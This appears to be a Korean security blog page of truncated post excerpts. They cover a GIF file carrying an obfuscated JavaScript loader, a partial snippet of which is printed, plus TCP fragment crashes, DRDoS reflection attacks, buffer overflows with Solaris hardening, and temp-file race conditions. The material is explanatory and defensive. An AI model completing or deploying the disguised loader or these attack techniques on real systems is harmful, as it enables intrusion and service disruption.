2013년 5월 이미지로 위장한 악성코드 파일입니다. 방어 분석용으로 사용하되 악용하진 마세요 국내에서 만들어진것도 포함되었습니다. 마지막 추적 소스 경로 국가명 ( Geoip DB ) : 스위스 , 미국 , 중국 , 한국

특정 웹사이트에 들어가면 gif 파일로딩시 바이러스라고 백신프로그램에서 체킹된다. 물론 바이러스 프로그램에 따라서 체킹이 안될 수 있는데. 긴급보안패치로 9월에 뉴스에도 나온것 같다. 아무튼 해당 gif파일을 서버에서 열어보니 GIF89a?Bz^S?script>function vxVVyyyVtYY(vyatdYxYYVy){ var vYVbVVyadad=594; return(parseInt(vyatdYxYYVy,16));}function vaxatxaVatd(vVaxyxtttVy){ var vVyyayVaYdx=594; var vtdYyYxtbYa='';for(vYYbYaydbYx=0; vYYbYaydbYx 와같은 html소스를 로딩하게끔 구현되어 있었다. 위의 코드중 nofomeka를 다시 얻어보니 위와 ..

- tcp frag 단편의 길이가 0 이하로 설정되있을 경우 어떤 O/S는 다른 프로그램의 영역까지 덮어 쓴다. 이로인하여 일부 운영체제는 시스템을 멈추거나 재부팅 된다.

DRDoS 란? DDoS (Distributed Denial of Service, 분산된 서비스 거부 공격) 의 한단계 지능적이고 더욱 치명적인 신종 공격 기법으로써, 국내에 입주중인 서버에는 아직 DRDoS 의 대한 피해가 보고되지 않았으나, 이미 해외에서는 그 피해가 급속도로 확산되고 있다. 현재, DRDoS 의 관한 보고서와 관련 보안 플랜등은 신종이니 만큼 DDoS 와 DoS 보다 미흡하다. 그 즉슨, 피해는 많이 보고되었으나, 확실한 방어법이나 대처법이 세워지지 않았다. 인터넷 그 자체를 이용하여 공격이 가능한 가장 진보된 해킹 기법이라 보는 사람도 있다. DDoS 와의 차이점 호스트 컴퓨터 (일명 봇) 이 필요 없다. 인터넷에 접속이 된 모든 TCP 서버나 개인용 컴퓨터로 공격 수행이 가능하며..

- Stack buffer overflow : 스택영역에 할당된 버퍼에 크기를 초과하는 데이터를 기록하고 리턴어드레스를 변경하여 임의의 코드 실행 - Heap overflow : 힙 영역에 할당된 버퍼의 크기를 초과하는 데이터를 기록하여 저장된 데이터 및 함수의 주소를 변경해 임의의 코드를 실행 - 메모리 구조 Lower Memory Address Program Header Table TEXT Area Initialized DATA Area Uninitialized DATA Area Heap Area Stack Area High Memoty Address - 대응책 : 1. 운영체제 커널 패치 /etc/system에서 다음 2줄 추가(Solaris) set noexec_user_stack=1 set no..

- 원리 : 임시 파일을 만들어 쓰고 지우는 과정에서 쓰기 바로직전 경쟁 조건을 이용하여 원하는 파일을 삽입한다. - 대책 : o 임시 파일을 만들지 않는다. o unlink() 불가능하게 한다. o creat(), open()의 구분을 확실히 한다. o umask 값을 022로 한다.